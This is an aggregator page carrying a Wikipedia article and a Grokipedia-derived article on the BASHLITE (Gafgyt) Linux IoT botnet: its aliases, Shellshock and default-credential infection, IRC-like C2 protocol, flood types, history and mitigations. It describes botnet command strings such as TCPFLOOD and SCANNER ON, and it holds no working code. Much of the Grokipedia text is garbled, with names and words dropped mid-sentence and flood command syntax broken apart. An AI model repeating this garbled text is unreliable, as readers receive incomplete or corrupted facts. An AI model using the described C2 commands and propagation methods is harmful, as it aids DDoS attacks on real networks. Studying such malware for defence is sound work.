Hubbry Logo
BASHLITEBASHLITEMain
Open search
BASHLITE
Community hub
BASHLITE
logo
7 pages, 0 posts
0 subscribers
Be the first to start a discussion here.
Be the first to start a discussion here.
BASHLITE
BASHLITE
BASHLITE
View on Wikipedia
from Wikipedia
BASHLITE
Malware details
Technical nameAs BashLite

As Gafgyt

  • ELF/Gafgyt.[letter]!tr (Fortinet)
  • HEUR:Backdoor.Linux.Gafgyt.[letter] (Kaspersky)
  • DDoS:Linux/Gafgyt.YA!MTB (Microsoft)
  • ELF_GAFGYT.[letter] (Trend Micro)

As QBot

  • Trojan-PSW.Win32.Qbot (Kaspersky)
  • Backdoor.Qbot (Malwarebytes)
  • Win32/Qakbot (Microsoft)
  • Bck/QBot (Panda)
  • Mal/Qbot-[letter] (Sophos)
  • W32.Qakbot (Symantec)
  • BKDR_QAKBOT (Trend Micro)
  • TROJ_QAKBOT (Trend Micro)
  • TSPY_QAKBOT (Trend Micro)
  • WORM_QAKBOT (Trend Micro)
  • Backdoor.Qakbot (VirusBuster)

As PinkSlip

  • W32/Pinkslipbot (McAfee)
As Torlus
AliasesGafgyt, Lizkebab, PinkSlip, Qbot, Torlus, LizardStresser
TypeBotnet
AuthorLizard Squad
Technical details
PlatformLinux
Written inC

BASHLITE (also known as Gafgyt, Lizkebab, PinkSlip, Qbot, Torlus and LizardStresser) is malware which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS).[1] Originally it was also known under the name Bashdoor,[2] but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.[3]

The original version in 2014 exploited a flaw in the bash shell - the Shellshock software bug - to exploit devices running BusyBox.[4][5][6][7] A few months later a variant was detected that could also infect other vulnerable devices in the local network.[8] In 2015 its source code was leaked, causing a proliferation of different variants,[9] and by 2016 it was reported that one million devices have been infected.[10][11][12][13]

Of the identifiable devices participating in these botnets in August 2016 almost 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers - and less than 1 percent were compromised Linux servers.[9]

Design

[edit]

BASHLITE is written in C, and designed to easily cross-compile to various computer architectures.[9]

Exact capabilities differ between variants, but the most common features[9] generate several different types of DDoS attacks: it can hold open TCP connections, send a random string of junk characters to a TCP or a UDP port, or repeatedly send TCP packets with specified flags. They may also have a mechanism to run arbitrary shell commands on the infected machine. There are no facilities for reflected or amplification attacks.

BASHLITE uses a client–server model for command and control. The protocol used for communication is essentially a lightweight version of Internet Relay Chat (IRC).[14] Even though it supports multiple command and control servers, most variants only have a single command and control IP-address hardcoded.

It propagates via brute forcing, using a built-in dictionary of common usernames and passwords. The malware connects to random IP addresses and attempts to login, with successful logins reported back to the command and control server.

See also

[edit]

References

[edit]
Revisions and contributorsEdit on WikipediaRead on Wikipedia

BASHLITE

View on Grokipedia
from Grokipedia
BASHLITE is a family targeting Linux-based systems, particularly (IoT) devices such as digital video recorders (DVRs), IP cameras, and routers, to form botnets that conduct distributed denial-of-service (DDoS) attacks. First identified in September 2014, it exploits vulnerabilities like the ShellShock flaw in the Bash command shell, as well as weak default credentials on and web interfaces, to propagate and infect devices. The , also known by aliases including Gafgyt, Qbot, Lizkebab, and Torlus, originated as an IRC-based before evolving to target IoT ecosystems, infecting over one million devices by mid-2016 and establishing command-and-control (C2) servers managing up to 120,000 bots each. Its capabilities include executing high-volume DDoS floods via protocols such as TCP SYN, UDP, ICMP, and GRE, with attack potentials reaching up to 400 Gbps; it also daemonizes processes, kills rival like Mirai variants, and has been adapted to target cloud environments and GPU resources for cryptomining in recent iterations. Primarily affecting DVRs and cameras (accounting for 95% of infections), it has hit routers from vendors like , , , and DrayTek, exploiting remote code execution flaws in these devices. BASHLITE's leaked in early , spawning over 12 variants and serving as a precursor to the more sophisticated , which amplified its influence on global cybersecurity by enabling massive DDoS incidents, including a record 620 Gbps attack on security researcher in 2016. Ongoing campaigns, such as those in 2019 targeting over 32,000 vulnerable routers worldwide and 2024 exploits of misconfigured Docker APIs and weak SSH passwords, underscore its persistence and adaptation to modern infrastructures like cloud-native setups; variants remain active as of 2025.

Overview

Discovery and Initial Naming

BASHLITE was first detected in September 2014 by security researchers shortly after the disclosure of the ShellShock vulnerability (CVE-2014-6271), a critical flaw in the Bash shell that allowed remote code execution on affected systems. The emerged amid widespread exploitation attempts targeting vulnerable servers and embedded devices, with early detections tied to scans leveraging the newly revealed Bash weakness. Trend Micro researchers coined the name BASHLITE to reflect the malware's reliance on the Bash shell for and , releasing a dedicated scanner tool just days after ShellShock's public reveal on September 24, 2014. This naming highlighted its Linux-specific nature and distinguished it from prior threats. Subsequent analyses confirmed its focus on commandeering Linux-based IoT devices for coordinated attacks. As awareness grew, other security firms adopted alternative designations based on observed samples and behaviors, including Gafgyt by in parallel references, Lizkebab, Torlus, and Qbot by various researchers tracking its variants. Early reports from firms like linked BASHLITE to a surge in Linux infections, particularly on unsecured embedded systems, setting the stage for its role in broader DDoS botnet ecosystems.

Core Purpose and Operations

BASHLITE is a family designed primarily to infect Linux-based systems and (IoT) devices, enlisting them into a for conducting distributed denial-of-service (DDoS) attacks. Its core objective is to overwhelm targeted servers, websites, or networks with excessive traffic, rendering them inaccessible to legitimate users. By exploiting vulnerabilities and weak credentials, BASHLITE transforms everyday connected devices—such as routers, cameras, and digital video recorders—into unwitting participants in these attacks. The operational workflow of BASHLITE begins with the compromise of vulnerable devices, often through scanning for open or SSH ports and attempting logins with default or common credentials. Once infected, the establishes a connection to a command-and-control (C2) server, where it awaits instructions from the operator. Upon receiving commands, infected devices execute coordinated flood-based DDoS attacks, such as TCP or UDP floods, directing traffic toward specified IP addresses or domains to exhaust the target's resources. This process allows the to scale attacks rapidly by leveraging the collective bandwidth of numerous compromised systems. BASHLITE demonstrated significant scale potential from its emergence. By mid-2016, research identified over 1 million devices under its influence across multiple C2 servers, highlighting its ability to amass large armies of bots primarily from IoT ecosystems. This growth underscored the malware's reliance on the expanding proliferation of unsecured connected devices.

Technical Architecture

Infection Vectors

BASHLITE primarily infects devices by exploiting the Shellshock vulnerability (CVE-2014-6271) in the GNU Bash shell, targeting Linux-based systems through HTTP requests to vulnerable web servers or CGI scripts that invoke Bash. This method allows attackers to execute arbitrary commands remotely, downloading and running malware payloads such as scripts (e.g., bin.sh) that install the botnet agent on unpatched embedded devices, including those using for lightweight Unix-like environments common in IoT hardware. In addition to Shellshock, BASHLITE spreads by scanning for open (ports 23 and 2323) and SSH ports on internet-connected devices, attempting logins with a hardcoded list of weak or default credentials, such as "admin," "root," or "123456." This brute-force approach exploits factory-default settings on IoT devices like routers, DVRs, and IP cameras from manufacturers such as Dahua, , and , which often ship with enabled remote access and unchanged passwords. The focuses on Linux-based embedded systems and unpatched servers, prioritizing those exposed to the via Shodan-like scans for vulnerable ports and services, enabling rapid propagation across networks of IoT devices with minimal security configurations.

Structure

BASHLITE utilizes a centralized (C2) architecture centered on dedicated servers that manage communications with infected IoT devices through a custom protocol modeled after Internet Relay Chat (IRC). The embeds hardcoded IP addresses of these C2 servers directly into its binary, enabling bots to connect immediately after without relying on dynamic resolution. These servers, frequently hosted on providers or content delivery networks, allow operators to broadcast directives to thousands of compromised devices simultaneously, with analysis identifying 486 unique C2 IPs distributed across 93 autonomous systems in 32 countries. The communication protocol operates over unencrypted TCP connections in plaintext, emulating IRC functionality while remaining lightweight to suit resource-constrained IoT hardware. Bots initiate sessions with C2 servers, typically on IRC-standard port 6667, though propagation often involves Telnet interactions on port 23. Commands are formatted as simple strings prefixed by an exclamation mark, such as !* TCPFLOOD <target IP> <port> <duration> <threads> <flags>, which instruct bots to execute specific actions; observed commands fall into categories like attacks (66.4% of traffic), management (18.4%), and interrupts (13.1%), with keep-alive PING/PONG messages exchanged every 60 seconds to sustain connections. For sustained operation and botnet growth, BASHLITE integrates self-propagation scripts within infected devices that continuously scan the network for new victims using brute-force credential attacks on Telnet and SSH services. Successful infections are reported back to the C2 server via the IRC-like channel, enabling automated expansion without manual intervention from operators; this mechanism, activated by commands like "!SCANNER ON," ensures the botnet's resilience and scale post-infection.

DDoS Attack Methods

BASHLITE employs a range of volumetric DDoS techniques to flood targets with excessive traffic, primarily leveraging the compromised IoT devices' ability to send high volumes of packets. The core attack methods include TCP SYN floods, which initiate numerous incomplete TCP handshakes to exhaust server resources by filling connection queues with half-open connections; UDP floods, which bombard targets with unsolicited UDP packets to saturate bandwidth; ICMP floods, which send excessive (ICMP) echo requests (pings) to overwhelm network resources; GRE floods, which exploit Generic Routing Encapsulation (GRE) packets to generate high-volume traffic; and HTTP GET/POST floods, which overwhelm web servers by simulating excessive legitimate requests at the . These methods target common ports such as 80 (HTTP), 443 (), and 53 (DNS), prioritizing simplicity and effectiveness over sophisticated evasion. The 's (C2) infrastructure directs these attacks through straightforward syntax issued to infected bots, typically formatted as "

[optional parameters]". For instance, a TCP SYN flood might use "tcpflood

syn", where the "syn" flag specifies the SYN-based variant, instructing bots to generate spoofed SYN packets for the specified time in seconds. Similarly, UDP floods can be commanded as "udpflood

", sending raw UDP datagrams without establishing connections, while ICMP floods use "icmpflood " and GRE floods use "gre ". HTTP floods follow analogous patterns, often denoted by methods like "httpflood" to repeatedly request resources. This modular command structure enables rapid deployment across the botnet. Infected IoT devices, often left always-on and undersecured, serve as persistent traffic generators, enabling sustained assaults that can scale significantly with size. Historical incidents demonstrate BASHLITE's capacity for attacks reaching up to 400 Gbps, achieved by coordinating thousands of low-bandwidth devices into a unified without relying on amplification in all cases. This leverages the devices' continuous availability for prolonged durations, often measured in minutes to hours as specified in commands.

Historical Development

Emergence in 2014

BASHLITE emerged in 2014, coinciding with the rapid expansion of (IoT) adoption, as the global installed base of connected devices surpassed 16 billion units that year. The malware's appearance followed closely after the public disclosure of the Shellshock vulnerability (CVE-2014-6271) on September 24, 2014, which exposed flaws in the Bash shell commonly used in Linux-based systems. First identified in September 2014, BASHLITE targeted the burgeoning ecosystem of unsecured IoT hardware, marking an early exploitation of the vulnerabilities inherent in this emerging technology landscape. The was likely developed by anonymous cybercriminals linked to the Lizard Squad hacking group, who operated without confirmed state sponsorship and focused on profit-driven cyber operations. Initially known under aliases such as Lizard Stresser, it powered a commercial DDoS-for-hire service launched in late , allowing customers to rent resources for targeted disruptions. This model reflected the motivations of opportunistic actors seeking to monetize compromised devices amid the low in the underground DDoS market at the time. BASHLITE achieved rapid early spread by compromising unpatched servers and nascent IoT devices, including home routers, through weak default credentials and exploits like Shellshock in environments. Infections proliferated quickly across vulnerable embedded systems, building scale in months and prompting initial responses from security researchers who collaborated with ISPs for the first takedowns in 2015.

Key Variants and Evolutions

One of the earliest significant variants of BASHLITE emerged in 2015 following the leak of its , which spurred the development of over 12 iterations, including Gafgyt. Another early evolution was Lizkebab. A pivotal evolution occurred in 2016 with the emergence of Mirai, which served as a precursor influenced by BASHLITE's to achieve faster across IoT networks. Mirai integrated self-contained scanning directly into the binary, eliminating the need for external tools and enabling rapid credential brute-forcing on a larger scale, which contrasted with BASHLITE's more modular approach. This adaptation allowed Mirai to amass botnets significantly larger than its predecessor, leveraging similar weak credential exploits but with added resilience through DNS-based command-and-control resolution. By 2019, BASHLITE itself saw direct updates that expanded its functionality beyond DDoS, incorporating mining modules and persistent backdoor commands for remote access. These enhancements targeted devices such as WeMo smart plugs, allowing operators to download and execute mining payloads alongside traditional attack commands, thereby diversifying revenue streams for threat actors. In 2024, variants under the Gafgyt lineage shifted focus toward cloud environments, exploiting weak SSH passwords on misconfigured servers, including those in AWS ecosystems, to deploy payloads from memory without disk writes. These updates emphasized GPU-accelerated cryptocurrency mining, prioritizing high-compute cloud instances like EC2 for greater efficiency over IoT DDoS recruitment. Gafgyt variants exploited the CVE-2023-1389 command injection vulnerability in routers to propagate, as did related botnets like Moobot. Later in 2024, Gafgyt campaigns targeted publicly exposed misconfigured Docker remote servers to deploy the malware via container creation.

Impact and Incidents

Targeted Devices and Scale

BASHLITE primarily targets (IoT) devices running -based operating systems, particularly those with MIPS and architectures, which are common in embedded systems due to their efficiency and widespread use in . Key examples include wireless routers, IP cameras, digital video recorders (DVRs), and smart plugs such as WeMo devices, as well as servers vulnerable to weak . These devices are often compromised through default credentials or unpatched vulnerabilities, enabling the to propagate and form botnets capable of coordinated distributed denial-of-service (DDoS) attacks. Industrial embedded systems, such as those in manufacturing equipment, are equally susceptible alongside consumer gadgets, highlighting the malware's broad reach across both sectors. The scale of BASHLITE infections has demonstrated significant growth, with botnets peaking at over 1 million devices by mid-2016, predominantly comprising DVRs and cameras that fueled large-scale DDoS operations. This expansion was driven by the malware's ability to exploit the rapid proliferation of insecure IoT hardware, resulting in millions of infection attempts documented through honeypot analyses capturing over 342 million commands from more than 2.3 million unique IP addresses. As of 2024, ongoing variants continue to infect millions of vulnerable IoT devices globally, sustained by persistent flaws in device and supply chain weaknesses. Some evolutions of BASHLITE have briefly extended to cloud-native environments, broadening potential infection vectors.

Notable DDoS Events

In 2015 and 2016, variants of BASHLITE, notably LizardStresser, were deployed by the Lizard Squad hacking group to execute DDoS attacks against gaming networks and internet service providers (ISPs). These incidents targeted platforms such as Xbox Live and Daybreak Games, causing widespread disruptions to online multiplayer services and affecting millions of users during holiday periods. One prominent attack in June 2016 peaked at 400 Gbps, leveraging compromised IoT devices like webcams and routers to overwhelm targets without amplification techniques, highlighting the growing scale of IoT-driven threats. The attacks prompted enhanced mitigation efforts by affected providers, including traffic filtering and collaboration with cybersecurity firms to dismantle related infrastructure. A significant overlap with BASHLITE occurred in the October 2016 DDoS assault on Dyn, a major DNS provider, which peaked at 1.2 Tbps and led to extensive internet outages across the and . This event, primarily powered by the Mirai botnet, disrupted access to high-profile sites including , , and for several hours. Mirai's codebase evolved directly from BASHLITE, incorporating similar infection mechanisms and DDoS payloads while expanding scanning capabilities for vulnerable IoT devices. The attack's consequences included economic losses estimated in millions and accelerated global awareness of IoT security risks, spurring regulatory discussions on device standards. In 2024, updated variants of BASHLITE, such as Gafgyt, shifted focus toward cloud-native environments, exploiting weak SSH passwords to infect servers and enable DDoS campaigns against hosted services. These attacks disrupted operations on platforms similar to AWS by commandeering GPU resources for both and flooding, demonstrating the malware's to hybrid cloud-IoT ecosystems. In 2025, Gafgyt continued to evolve, with campaigns targeting misconfigured Docker remote servers to deploy and build botnets for DDoS attacks, alongside surges in IoT device exploits contributing to large-scale disruptions. Active indicators of were reported as of 2025.

Mitigation Strategies

Exploited Vulnerabilities

BASHLITE primarily exploited the ShellShock vulnerability, designated as CVE-2014-6271, which carries a CVSS base score of 10.0 and enables remote code execution through the improper processing of trailing strings after function definitions in environment variables by the GNU Bash shell versions up to 4.3. This flaw allowed attackers to inject and execute arbitrary commands on vulnerable Linux-based systems, particularly those running , facilitating the initial infection of IoT devices shortly after the vulnerability's disclosure in September 2014. In addition to ShellShock, BASHLITE targeted devices with weak authentication mechanisms on and SSH services, commonly exploiting default or unchanged credentials that manufacturers set for administrative access, without relying on a specific CVE but leveraging widespread misconfigurations in IoT ecosystems. Later variants, such as Gafgyt, expanded to exploit CVE-2017-18368, a command injection vulnerability in P-660HN-T1A routers running firmware versions prior to 3.40(ULM.0)b31, allowing remote attackers to execute arbitrary code via crafted HTTP requests to the web management interface. More recent evolutions of BASHLITE, including Gafgyt strains, have incorporated exploits for CVE-2023-1389, a command injection flaw in Archer AX21 routers with versions before 1.1.4 Build 20230219, where improper handling of the "" parameter in the web interface permits unauthenticated remote code execution. These variants demonstrate a pattern of targeting buffer overflows and injection points in router to propagate across networks. As of 2025, BASHLITE and its derivatives persist in exploiting unpatched vulnerabilities in IoT devices, reliance on factory-default credentials, and openly accessible services such as , which remain prevalent due to delayed updates in resource-constrained environments. This approach underscores the malware's adaptability to common security oversights rather than solely zero-day flaws, enabling sustained infections in embedded systems.

Detection and Prevention Techniques

Detection of BASHLITE infections primarily relies on network-based monitoring techniques that identify characteristic communication patterns and anomalous traffic generated by compromised IoT devices. Security tools such as Snort and enable the analysis of packet captures () to detect IRC-based command-and-control (C2) traffic, which BASHLITE commonly uses on TCP port 6667 for coordination. Custom signatures in Snort can target IRC protocols, brute-force attempts on /SSH ports (e.g., 23/TCP and 22/TCP), and file downloads associated with propagation, achieving detection accuracies up to 99.95% on IoT datasets like IoT-23. Similarly, facilitates manual inspection of outbound DDoS packets, revealing unusual UDP/TCP flooding patterns or floods that deviate from normal device behavior, such as high-volume traffic to random IP addresses. Anomaly detection complements signature-based methods by flagging deviations in network flows, including sudden spikes in egress traffic or connections to known malicious IRC servers. Intrusion detection systems (IDS) like , which supports multi-threading for efficient processing of IoT traffic, can generate alerts for these anomalies with processing times as low as 112 seconds on Bot-IoT datasets and CPU usage under 15% at high packet rates. For instance, Suricata's rulesets can monitor for propagation scripts attempting dictionary attacks on weak credentials, a core infection vector for BASHLITE. Prevention strategies emphasize securing IoT devices against BASHLITE's exploitation of default configurations and unpatched vulnerabilities. Regularly applying updates and security patches is essential to close known flaws, such as those in or shell interpreters that BASHLITE targets via or SSH. Disabling unnecessary remote access services like (port 23/TCP) and SSH, or restricting them to specific users, prevents initial infections through brute-force attacks; blocking non-essential ports like 48101/TCP further limits exposure. Implementing strong, unique policies overrides default credentials, which BASHLITE scanners exploit extensively. Network segmentation via firewalls isolates IoT devices into separate VLANs or subnets, preventing lateral movement if one device is compromised and containing DDoS traffic to affected segments. Firewalls should enforce rules to block inbound connections to vulnerable ports and outbound to suspicious destinations, with next-generation firewalls dynamically adjusting segments based on device profiles. Intrusion prevention systems (IPS) like can be integrated into these setups to actively drop malicious packets in real-time, enhancing overall resilience. Advanced measures incorporate behavioral analysis to detect subtle propagation and C2 activities beyond static signatures. (EDR) tools, such as those from , can monitor for anomalous script executions on supported IoT gateways or edge devices, identifying BASHLITE's shell scripts that attempt or binary downloads through runtime behavior profiling. This approach flags deviations like delayed process launches or memory-resident payloads, common in BASHLITE variants to evade traditional antivirus. For botnet disruption, sinkholing redirects traffic from identified C2 IRC servers to controlled sinks, isolating infected devices and preventing command receipt; this has been effective against IRC-based s by hijacking DNS resolutions for known malicious channels. Recent Gafgyt variants as of November 2025 have expanded to cloud environments, exploiting misconfigured Docker remote APIs and weak SSH passwords. To mitigate these, bind Docker APIs to or use and TLS; for SSH, enforce key-based and disable password logins.

References

  1. https://www.cyber.nj.gov/threat-landscape/malware/botnets/bashlite
  2. https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
  3. https://ieeexplore.ieee.org/document/8538636
  4. https://www.aquasec.com/blog/gafgyt-malware-variant-exploits-gpu-power-and-cloud-native-environments/
  5. https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-docker-remote-api-servers.html
  6. https://medium.com/@dnld/binary-analysis-demystifying-gafgyt-malware-inside-a-lightweight-botnet-8217eb99365c
  7. https://newsroom.trendmicro.com/2014-09-26-Trend-Micro-Launches-Free-Protection-for-Shellshock-a-k-a-Bash-Bug
  8. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/gafgyt
  9. https://www.securityweek.com/bashlite-botnets-ensnare-1-million-iot-devices/
  10. https://honeytarg.cert.br/honeypots/docs/papers/honeypots-iscc18.pdf
  11. https://www.darkreading.com/cyberattacks-data-breaches/-bashlite-malware-leverages-shellshock-in-busybox-attack
  12. https://securityaffairs.com/30225/cyber-crime/bashlite-exploits-shellshock.html
  13. https://www.securityweek.com/bashlite-malware-uses-shellshock-hijack-devices-running-busybox/
  14. https://www.cisa.gov/news-events/alerts/2016/10/14/heightened-ddos-threat-posed-mirai-and-other-botnets
  15. https://homepages.dcc.ufmg.br/~cunha/papers/marzano18iscc-botnets.pdf
  16. https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6386856/
  17. https://securityscorecard.com/wp-content/uploads/2024/01/Report-A-Detailed-Analysis-Of-The-Gafgyt-Malware-Targeting-IoT-Devices.pdf
  18. https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-several-routers-devices.html
  19. https://www.computerweekly.com/news/450299445/LizardStresser-IoT-botnet-launches-400Gbps-DDoS-attack
  20. https://www.forbes.com/sites/gilpress/2014/08/22/internet-of-things-by-the-numbers-market-estimates-and-forecasts/
  21. https://krebsonsecurity.com/2015/01/lizard-stresser-runs-on-hacked-home-routers/
  22. https://www.trendmicro.com/en_us/research/19/d/bashlite-iot-malware-updated-with-mining-and-backdoor-commands-targets-wemo-devices.html
  23. https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
  24. https://www.mdpi.com/1424-8220/21/21/6983
  25. https://www.theguardian.com/technology/2015/feb/16/lizard-squad-attacks-xbox-live-daybreak-games
  26. https://www.infosecurity-magazine.com/magazine-features/lizard-squad-original-pranksters/
  27. https://www.bitdefender.com/en-us/blog/hotforsecurity/lizardstresser-recruits-an-army-of-zombie-webcams-to-launch-ddos-attacks
  28. https://securityaffairs.com/tag/lizard-squad
  29. https://thehackernews.com/2016/10/dyn-dns-ddos.html
  30. https://www.thesslstore.com/blog/largest-ddos-attack-in-history/
  31. https://research.google.com/pubs/archive/46301.pdf
  32. https://www.theguardian.com/technology/2016/oct/26/ddos-attack-dyn-mirai-botnet
  33. https://thehackernews.com/2024/08/new-gafgyt-botnet-variant-targets-weak.html
  34. https://rewterz.com/threat-advisory/gafgyt-aka-bashlite-malware-active-iocs-12
  35. https://www.infosecurity-magazine.com/news/php-servers-and-iot-devices-cyber/
  36. https://nvd.nist.gov/vuln/detail/CVE-2014-6271
  37. https://thehackernews.com/2014/11/bashlite-malware-leverages-shellshock.html
  38. https://www.fortinet.com/blog/threat-research/2022-iot-threat-review
  39. https://nvd.nist.gov/vuln/detail/CVE-2017-18368
  40. https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-a-new-variant-of-gafgyt-malware
  41. https://nvd.nist.gov/vuln/detail/CVE-2023-1389
  42. https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/
  43. https://www.open-access.bcu.ac.uk/14223/1/Botnet_Detection_in_IoT_Repo.pdf
  44. https://pdfs.semanticscholar.org/e869/a8cb82b4fc931663af42c10aa23a951042d8.pdf
  45. https://www.sentinelone.com/blog/new-trojan-virus-targeting-iot-devices/
  46. https://www.fortinet.com/blog/industry-trends/security-driven-network-addressing-IoT-botnets
  47. https://www.iotforall.com/iot-security-solutions
  48. https://www.crowdstrike.com/en-us/resources/white-papers/endpoint-detection-and-response/
  49. https://onlinelibrary.wiley.com/doi/10.1002/ett.5056?af=R
  50. https://threats.wiz.io/all-incidents/gafgyt-malware-targeting-cloud-environments
Add your contribution
Related Hubs
User Avatar
No comments yet.